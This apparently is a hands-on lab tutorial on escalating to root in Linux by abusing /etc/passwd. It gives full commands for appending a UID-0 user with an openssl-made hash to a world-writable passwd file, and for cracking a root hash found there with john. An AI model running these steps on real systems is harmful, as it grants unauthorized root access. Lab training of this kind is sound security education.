The /etc/passwd and /etc/shadow files are crucial for user authentication in Linux systems. If system administrators misconfigure the contents or permissions of these files, it can lead to privilege escalation vulnerabilities. In this lab, we will explore methods for privilege escalation by exploiting the /etc/passwd file.
In this step, we will explore the structure and meaning of the /etc/passwd file.
On Linux systems, user password information is stored in two files: /etc/passwd and /etc/shadow. The /etc/passwd file contains user information, with each line representing a single user account. Each line is divided into seven colon-separated fields:
x, the password is stored in /etc/shadow)Now, Open a terminal and Navigate to the /home/labex/project directory to proceed to the next step.
cd /home/labex/projectGet labex user's information from the /etc/passwd file and save it to a file named labex_passwd.txt in the /home/labex/project directory.
grep labex /etc/passwd > /home/labex/project/labex_passwd.txtCheck the contents of the labex_passwd.txt file.
cat labex_passwd.txtExpected output:
labex:x:5000:5000::/home/labex:/usr/bin/zshHere's what each field represents:
/etc/shadow (indicated by x)/home/labex/usr/bin/zshDuring the Linux authentication process, the following steps occur:
/etc/passwd file.0 represents the root user, granting full administrative privileges, regardless of the username.As you can see, the /etc/passwd file plays a critical role in the Linux authentication process. If an attacker can modify this file, they may be able to gain unauthorized access and escalate their privileges.
In this step, we will learn how to escalate privileges by exploiting write access to the /etc/passwd file.
First, let's set up the lab environment. Open a terminal and navigate to the /home/labex/project directory:
cd /home/labex/projectrun the following command to set up the lab environment:
./env_setup1.shThis command will execute a script that sets up the lab environment. You should see an output indicating that the environment is ready.
After the setup, you will be logged in as the user001 user, simulating an initial shell access obtained during a penetration test.
Navigate to the user001 user's home directory:
cd ~Use the whoami command to verify your current user:
whoamiExpected output:
user001Use the id command to view your user and group IDs:
idExpected output:
uid=1001(user001) gid=1001(user001) groups=1001(user001)As you can see, you are a regular user without any special privileges.
Next, check the permissions of the /etc/passwd and /etc/shadow files:
ls -l /etc/passwd /etc/shadowExpected output:
--wx--xrwx 1 root root 1961 Apr 5 00:21 /etc/passwd
-rw-r----- 1 root user001 1101 Apr 5 00:21 /etc/shadowNotice that the /etc/passwd file has execute and write permissions for all users (--wx--xrwx), which is a misconfiguration by the system administrator.
Our goal is to create a new user entry in the /etc/passwd file with a custom username, password, and a UID of 0 (root). This will allow us to log in as the root user.
First, let's examine the format of the root user's entry in the /etc/passwd file by extracting it to a new file named new_user_entry.txt:
cat /etc/passwd | grep root > new_user_entry.txtExpected output when you use the cat command to view the contents of the new_user_entry.txt file:
root:x:0:0:root:/root:/bin/bashTo create our own entry, change the username from root to any desired name, such as new-user in the new_user_entry.txt file:
new-user:x:0:0:root:/root:/bin/bashReplace the x in the second field with the encrypted password hash. We can use the openssl tool to generate the hash for a password (e.g., pass123):
openssl passwd -1 -salt ignite pass123Expected output:
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1Substituting the hash in the second field in the new_user_entry.txt file:
new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bashNow, append this line to the /etc/passwd file:
echo "$(cat new_user_entry.txt)" >> /etc/passwdNote: We can append the new entry to the /etc/passwd file because it has write permissions for all users. In a real-world scenario, this file should not have write permissions for regular users.
Verify the new entry by searching for new-user in the /etc/passwd file:
cat /etc/passwd | grep new-userExpected output:
new-user:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bashFinally, switch to the new-user user with the password pass123:
su new-userEnter the password pass123 when prompted. You should now have root privileges, as indicated by the change in the prompt:
user001@660ecfa4d7612c798ef141ab:~$ su new-user
Password:
root@660ecfa4d7612c798ef141ab:/home/user001#In this step, we will learn how to escalate privileges when the root user's password hash is stored in the /etc/passwd file instead of the /etc/shadow file.
First, let's set up the lab environment. Open a terminal and navigate to the /home/labex/project directory:
If you sitll as new-user, you can use the exit command to exit the current shell till you reach the labex shell, then navigate to the /home/labex/project directory:
cd /home/labex/projectRun the following command to set up the lab environment:
./env_setup2.shThis command will execute a script that sets up the lab environment. You should see an output indicating that the environment is ready.
After the setup, you will be logged in as the user001 user, simulating an initial shell access obtained during a penetration test.
Navigate to the user001 user's home directory:
cd ~Check the permissions of the /etc/passwd and /etc/shadow files:
ls -l /etc/passwd /etc/shadow-rw-r--r-- 1 root root 2059 Apr 5 01:36 /etc/passwd
-rw-r----- 1 root root 1101 Apr 5 00:21 /etc/shadowThis time, the file permissions are correctly configured, and you only have read access to the /etc/passwd file.
View the contents of the /etc/passwd file to find the root user's password hash:
cat /etc/passwd | grep ^root > ~/hash.txtCheck the contents of the hash.txt file by running the following command:
cat ~/hash.txtExpected output:
root:$1$ignite$J98A8EVPG1O40.WnwrPEM1:0:0:root:/root:/bin/bashNotice that the root user's password hash is stored in the second field of the /etc/passwd file. This is usually the result of a previous system compromise or misconfiguration by the system administrator.
Now, run john to crack the hash:
john ~/hash.txt > ~/cracked.txtjohn is a popular password-cracking tool that uses dictionary attacks to crack password hashes. The output will indicate whether the password was successfully cracked.
Created directory: /home/user001/.john
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:00 100% 2/3 5.000g/s 6680p/s 6680c/s 6680C/s 123456..crawford
Use the "--show" option to display all of the cracked passwords reliably
Session completedCheck the contents of the cracked.txt file to view the cracked password:
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
hello (root)As you can see, john successfully cracked the password, which is hello.
Use the su command to switch to the root user, entering the cracked password when prompted:
su rootEnter the password hello when prompted. You should now have root privileges as indicated by the change in the command prompt.
user001@660ecfa4d7612c798ef141ab:~$ su root
Password:
root@660ecfa4d7612c798ef141ab:/home/user001#In this lab, we learned about the Linux user authentication process, the significance of the /etc/passwd file, and how to exploit it for privilege escalation. We covered two scenarios: (1) when the /etc/passwd file has write permissions, allowing us to create a new user entry with root privileges, and (2) when the root user's password hash is stored in the /etc/passwd file, enabling us to crack the password using the john tool. Through hands-on practice, we gained a deeper understanding of how to leverage misconfigurations in the /etc/passwd file to escalate privileges on a Linux system.